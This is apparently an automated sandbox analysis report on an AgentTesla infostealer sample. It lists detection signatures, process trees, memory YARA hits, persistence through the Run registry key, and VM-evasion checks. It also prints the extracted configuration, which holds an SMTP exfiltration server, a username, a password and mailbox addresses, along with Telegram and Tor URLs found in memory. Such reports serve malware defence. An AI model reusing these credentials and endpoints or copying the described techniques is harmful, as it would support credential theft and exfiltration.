Play interactive tour

Edit tour

Analysis Report jF6LSw9bnC.exe

Overview

General Information

Sample Name:	jF6LSw9bnC.exe
Analysis ID:	321397
MD5:	020bc13012ce4db6e204cb1ed174851e
SHA1:	46f8ff39e0d5f476b0c2e3a1c8feefdfec32a0b2
SHA256:	265e971392e878a245def23cc9544060fcafbdc0c61c66cf128688f3d64e2179
Tags:	exe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Moves itself to temp directory

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

jF6LSw9bnC.exe (PID: 5864 cmdline: 'C:\Users\user\Desktop\jF6LSw9bnC.exe' MD5: 020BC13012CE4DB6E204CB1ED174851E)

jF6LSw9bnC.exe (PID: 6056 cmdline: jF6LSw9bnC.exe MD5: 020BC13012CE4DB6E204CB1ED174851E)

jF6LSw9bnC.exe (PID: 6024 cmdline: jF6LSw9bnC.exe MD5: 020BC13012CE4DB6E204CB1ED174851E)

jF6LSw9bnC.exe (PID: 5888 cmdline: jF6LSw9bnC.exe MD5: 020BC13012CE4DB6E204CB1ED174851E)

YYtJku.exe (PID: 5004 cmdline: 'C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe' MD5: 020BC13012CE4DB6E204CB1ED174851E)

YYtJku.exe (PID: 6124 cmdline: YYtJku.exe MD5: 020BC13012CE4DB6E204CB1ED174851E)

YYtJku.exe (PID: 5940 cmdline: 'C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe' MD5: 020BC13012CE4DB6E204CB1ED174851E)

YYtJku.exe (PID: 4092 cmdline: YYtJku.exe MD5: 020BC13012CE4DB6E204CB1ED174851E)

YYtJku.exe (PID: 4260 cmdline: YYtJku.exe MD5: 020BC13012CE4DB6E204CB1ED174851E)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "AmggJD", "URL: ": "https://cmY5Rn8HrJ6zxDC.com", "To: ": "ralcerreca@valle-maule.cl", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "gxpTPioxht6x4ob", "From: ": "ralcerreca@valle-maule.cl"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.224466566.0000000005CE5000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.304664651.000000000117A000.00000004.00000020.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.224130542.00000000059A2000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.334155127.0000000005812000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.308785428.00000000056C2000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.332958672.0000000004B64000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.223257236.0000000005044000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: YYtJku.exe PID: 6124	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: YYtJku.exe PID: 6124	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YYtJku.exe PID: 5940	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jF6LSw9bnC.exe PID: 5888	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jF6LSw9bnC.exe PID: 5888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YYtJku.exe PID: 4260	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: YYtJku.exe PID: 4260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YYtJku.exe PID: 5004	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jF6LSw9bnC.exe PID: 5864	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author
13.2.YYtJku.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
14.2.YYtJku.exe.5810000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.jF6LSw9bnC.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
16.2.YYtJku.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.YYtJku.exe.56c0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.jF6LSw9bnC.exe.59a0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: jF6LSw9bnC.exe.5888.3.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "AmggJD", "URL: ": "https://cmY5Rn8HrJ6zxDC.com", "To: ": "ralcerreca@valle-maule.cl", "ByHost: ": "us2.smtp.mailhostbox.com:587", "Password: ": "gxpTPioxht6x4ob", "From: ": "ralcerreca@valle-maule.cl"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Virustotal: Detection: 45%			Perma Link
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Show sources

Source: jF6LSw9bnC.exe	Virustotal: Detection: 45%			Perma Link
Source: jF6LSw9bnC.exe	ReversingLabs: Detection: 47%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: jF6LSw9bnC.exe

Joe Sandbox ML: detected

Source: 13.2.YYtJku.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 3.2.jF6LSw9bnC.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 16.2.YYtJku.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8

Source: global traffic

TCP traffic: 192.168.2.3:49705 -> 208.91.199.223:587

Source: Joe Sandbox View

IP Address: 208.91.199.223 208.91.199.223

Source: global traffic

TCP traffic: 192.168.2.3:49705 -> 208.91.199.223:587

Source: unknown

DNS traffic detected: queries for: us2.smtp.mailhostbox.com

Source: jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	String found in binary or memory: http://HsjGXz.com
Source: jF6LSw9bnC.exe, 00000003.00000002.481145752.0000000006B80000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: jF6LSw9bnC.exe, 00000003.00000002.481145752.0000000006B80000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0A
Source: jF6LSw9bnC.exe, 00000003.00000002.478242440.00000000036EA000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: jF6LSw9bnC.exe, 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, jF6LSw9bnC.exe, 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, jF6LSw9bnC.exe, 00000003.00000002.478507569.0000000003712000.00000004.00000001.sdmp	String found in binary or memory: https://cmY5Rn8HrJ6zxDC.com
Source: jF6LSw9bnC.exe, 00000003.00000002.481145752.0000000006B80000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: jF6LSw9bnC.exe, 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, jF6LSw9bnC.exe, 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, YYtJku.exe, 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: jF6LSw9bnC.exe, 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, YYtJku.exe, 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, YYtJku.exe, 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_054C1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,		12_2_054C1C09
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_054C00AD NtOpenSection,NtMapViewOfSection,		12_2_054C00AD

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 0_2_0106F3A9	0_2_0106F3A9
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 0_2_01070078	0_2_01070078
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 0_2_019D04F0	0_2_019D04F0
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 1_2_002EF3A9	1_2_002EF3A9
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 1_2_002F0078	1_2_002F0078
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 2_2_0029F3A9	2_2_0029F3A9
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 2_2_002A0078	2_2_002A0078
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_00FE0078	3_2_00FE0078
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_00FDF3A9	3_2_00FDF3A9
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_031F46A0	3_2_031F46A0
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_031F35C4	3_2_031F35C4
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_031F45B0	3_2_031F45B0
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_031F5390	3_2_031F5390
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_031FDA00	3_2_031FDA00
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_06676C70	3_2_06676C70
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_066794F8	3_2_066794F8
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_06677540	3_2_06677540
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_06676928	3_2_06676928
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_06925294	3_2_06925294
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_0692BD68	3_2_0692BD68
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_00B7F3A9	12_2_00B7F3A9
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_00B80078	12_2_00B80078
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_015104F0	12_2_015104F0
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 12_2_015104E1	12_2_015104E1
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 13_2_00BBF3A9	13_2_00BBF3A9
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 13_2_00BC0078	13_2_00BC0078
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 13_2_02E746A0	13_2_02E746A0
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 13_2_02E74630	13_2_02E74630
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 13_2_02E74610	13_2_02E74610

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe 265E971392E878A245DEF23CC9544060FCAFBDC0C61C66CF128688F3D64E2179

Source: jF6LSw9bnC.exe, 00000000.00000002.224256734.0000000005BC0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRBQbXtvoHrtdKjzk.bounce.exe4 vs jF6LSw9bnC.exe
Source: jF6LSw9bnC.exe, 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYvzReyxfkkAzqrcXBNwUgGSKaHAFjdRpWcffE.exe4 vs jF6LSw9bnC.exe
Source: jF6LSw9bnC.exe, 00000003.00000002.471043999.0000000001378000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs jF6LSw9bnC.exe
Source: jF6LSw9bnC.exe, 00000003.00000002.473569129.00000000016F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs jF6LSw9bnC.exe
Source: jF6LSw9bnC.exe, 00000003.00000002.481013627.0000000006910000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx vs jF6LSw9bnC.exe
Source: jF6LSw9bnC.exe, 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameYvzReyxfkkAzqrcXBNwUgGSKaHAFjdRpWcffE.exe4 vs jF6LSw9bnC.exe

Source: jF6LSw9bnC.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: YYtJku.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9215/4@1/2

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jF6LSw9bnC.exe.log

Jump to behavior

Source: jF6LSw9bnC.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: jF6LSw9bnC.exe	Virustotal: Detection: 45%
Source: jF6LSw9bnC.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

File read: C:\Users\user\Desktop\jF6LSw9bnC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe 'C:\Users\user\Desktop\jF6LSw9bnC.exe'
Source: unknown	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe
Source: unknown	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe
Source: unknown	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe 'C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe 'C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process created: C:\Users\user\Desktop\jF6LSw9bnC.exe jF6LSw9bnC.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Process created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe YYtJku.exe

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: jF6LSw9bnC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jF6LSw9bnC.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_0667A61F push es; iretd	3_2_0667A63C
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_06678540 push es; ret	3_2_06678550
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Code function: 3_2_0692A0D1 push es; ret	3_2_0692A0E0
Source: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe	Code function: 13_2_02E7DD38 push FFFFFF8Bh; iretd	13_2_02E7DD3B

Source: initial sample	Static PE information: section name: .text entropy: 7.86673164949
Source: initial sample	Static PE information: section name: .text entropy: 7.86673164949

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

File created: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe

Jump to dropped file

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run YYtJku			Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run YYtJku			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe

File opened: C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe:Zone.Identifier read attributes | delete

Jump to behavior

Moves itself to temp directory

Show sources

Source: c:\users\user\desktop\jf6lsw9bnc.exe

File moved: C:\Users\user\AppData\Local\Temp\tmpG710.tmp

Jump to behavior

Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jF6LSw9bnC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
